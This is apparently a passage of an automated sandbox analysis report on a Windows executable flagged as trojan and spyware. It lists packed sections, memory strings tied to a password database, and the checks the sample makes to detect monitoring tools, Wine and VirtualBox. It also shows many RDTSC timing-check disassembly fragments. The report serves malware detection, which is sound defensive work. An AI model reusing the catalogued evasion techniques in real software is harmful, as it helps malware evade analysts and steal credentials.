              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EB70B70_2_00EB70B7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DDF0B40_2_00DDF0B4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E7308C0_2_00E7308C
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1509E0_2_00E1509E
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E090670_2_00E09067
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E130730_2_00E13073
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D610400_2_00D61040
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E8D0750_2_00E8D075
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EBB0750_2_00EBB075
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EF50700_2_00EF5070
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E770470_2_00E77047
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E990490_2_00E99049
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E550440_2_00E55044
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E8B0430_2_00E8B043
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA70230_2_00EA7023
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D670060_2_00D67006
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E790370_2_00E79037
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E490370_2_00E49037
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E8500A0_2_00E8500A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D690300_2_00D69030
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2900A0_2_00E2900A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC50040_2_00EC5004
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D911DA0_2_00D911DA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DED1DB0_2_00DED1DB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EBF1E70_2_00EBF1E7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC31F70_2_00EC31F7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E531C40_2_00E531C4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E7F1C10_2_00E7F1C1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E3F1CE0_2_00E3F1CE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC11C10_2_00EC11C1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E951DA0_2_00E951DA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E431A20_2_00E431A2
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2F1AA0_2_00E2F1AA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DFB1930_2_00DFB193
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DD71B40_2_00DD71B4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE71B30_2_00DE71B3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0D1630_2_00E0D163
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E271650_2_00E27165
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E611770_2_00E61177
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1117E0_2_00E1117E
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E671500_2_00E67150
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2515B0_2_00E2515B
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA51600_2_00DA5160
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E4512E0_2_00E4512E
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EAB13D0_2_00EAB13D
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EAD1000_2_00EAD100
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1B10F0_2_00E1B10F
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EC71100_2_00EC7110
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E2F2E80_2_00E2F2E8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E5D2C10_2_00E5D2C1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D6D2F00_2_00D6D2F0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA32C60_2_00EA32C6
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E332D10_2_00E332D1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EBB2D80_2_00EBB2D8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E0B2D40_2_00E0B2D4
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DD52950_2_00DD5295
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E3B2AB0_2_00E3B2AB
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E312A80_2_00E312A8
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E592B50_2_00E592B5
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE128A0_2_00DE128A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D892A00_2_00D892A0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E052610_2_00E05261
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E472650_2_00E47265
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E9F2610_2_00E9F261
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA32500_2_00DA3250
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E1D26D0_2_00E1D26D
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EAF2780_2_00EAF278
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E8723A0_2_00E8723A
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DCF2060_2_00DCF206
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00D9B2380_2_00D9B238
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00EA12110_2_00EA1211
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E8F3EE0_2_00E8F3EE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E973F00_2_00E973F0
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E6D3FA0_2_00E6D3FA
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DFD3EE0_2_00DFD3EE
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00E693D70_2_00E693D7
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED33D90_2_00ED33D9
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00ED73D30_2_00ED73D3
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DE73E10_2_00DE73E1
              Source: C:\Users\user\Desktop\FvbuInU.exeCode function: 0_2_00DA53900_2_00DA5390
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: String function: 00D7A420 appears 110 times
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: String function: 00D6B380 appears 49 times
              Source: FvbuInU.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: FvbuInU.exe Static PE information: Section: kzbupdkl ZLIB complexity 0.9941578305361483
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\FvbuInU.exe Code function: 0_2_00D98AC0 CoCreateInstance,0_2_00D98AC0
              Source: C:\Users\user\Desktop\FvbuInU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: FvbuInU.exe, 00000000.00000003.1420364272.0000000005CAF000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1420540032.0000000005CA4000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1362376294.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: FvbuInU.exe Virustotal: Detection: 76%
              Source: FvbuInU.exe ReversingLabs: Detection: 76%
              Source: FvbuInU.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\FvbuInU.exe File read: C:\Users\user\Desktop\FvbuInU.exe
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\FvbuInU.exe Section loaded: version.dll
              Source: FvbuInU.exe Static file information: File size 2090496 > 1048576
              Source: FvbuInU.exe Static PE information: Raw size of kzbupdkl is bigger than: 0x100000 < 0x19b800

              Data Obfuscation

              Source: C:\Users\user\Desktop\FvbuInU.exe Unpacked PE file: 0.2.FvbuInU.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzbupdkl:EW;bmqfvobi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kzbupdkl:EW;bmqfvobi:EW;.taggant:EW;
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: FvbuInU.exe Static PE information: real checksum: 0x20b4c1 should be: 0x202360
              Source: FvbuInU.exe Static PE information: section name:
              Source: FvbuInU.exe Static PE information: section name: .idata
              Source: FvbuInU.exe Static PE information: section name:
              Source: FvbuInU.exe Static PE information: section name: kzbupdkl
              Source: FvbuInU.exe Static PE information: section name: bmqfvobi
              Source: FvbuInU.exe Static PE information: section name: .taggant
              Source: FvbuInU.exe Static PE information: section name: entropy: 7.20142058220356
              Source: FvbuInU.exe Static PE information: section name: kzbupdkl entropy: 7.952571902495584

              Boot Survival

              Source: C:\Users\user\Desktop\FvbuInU.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\FvbuInU.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\FvbuInU.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\FvbuInU.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\FvbuInU.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\FvbuInU.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\FvbuInU.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\FvbuInU.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\FvbuInU.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\FvbuInU.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7EB57 second address: F7EB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7EB5B second address: F7EB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7FA18 second address: F7FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7EC78 second address: F7EC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7EC7C second address: F7EC82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F809C6 second address: F809CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7EC82 second address: F7ECEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E8511F5DFh 0x00000008 jbe 00007F8E8511F5D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D28F2h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, eax 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov edi, dword ptr [ebp+122D188Fh] 0x0000002e mov eax, dword ptr [ebp+122D0855h] 0x00000034 mov edi, dword ptr [ebp+1247468Fh] 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F8E8511F5D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 nop 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7ECEF second address: F7ED12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF87h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7ED12 second address: F7ED16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F819AA second address: F819BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8E84B4EF76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F80B1A second address: F80B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7FB73 second address: F7FB7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F819BC second address: F819C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F7FB7D second address: F7FB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F80BE3 second address: F80BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F80BE8 second address: F80C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF89h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F82A21 second address: F82A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F82A25 second address: F82A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F8E84B4EF76h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F81B7A second address: F81B7F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F83A67 second address: F83A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8E84B4EF76h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F83A72 second address: F83A84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8E8511F5D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F84B6D second address: F84B72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F86D69 second address: F86DC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a sub bx, C7F9h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F8E8511F5D8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F8E8511F5E3h 0x00000030 mov ebx, dword ptr [ebp+12479A01h] 0x00000036 push 00000000h 0x00000038 mov ebx, 1E26E587h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F86DC3 second address: F86DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F8E6DA second address: F8E6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F920E7 second address: F920ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F920ED second address: F920F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F920F3 second address: F92111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8E84B4EF89h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F92111 second address: F9212C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E6h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918A1 second address: F918A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918A7 second address: F918AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918AD second address: F918B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918B3 second address: F918BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918BD second address: F918C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F918C3 second address: F918C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F91B55 second address: F91B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F91B59 second address: F91B6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b jns 00007F8E8511F5D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F97734 second address: F9775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F8E84B4EF76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8E84B4EF80h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9775A second address: F97764 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E8511F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F97764 second address: F97771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F97771 second address: F97776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F97776 second address: F9779A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F8E84B4EF94h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9EC1E second address: F9EC24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9E056 second address: F9E05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9E33A second address: F9E340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9E7B2 second address: F9E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9E909 second address: F9E914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8E8511F5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: F9EA89 second address: F9EA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF7Bh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\FvbuInU.exeRDTSC instruction interceptor: First address: FA3DB6 second address: FA3DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
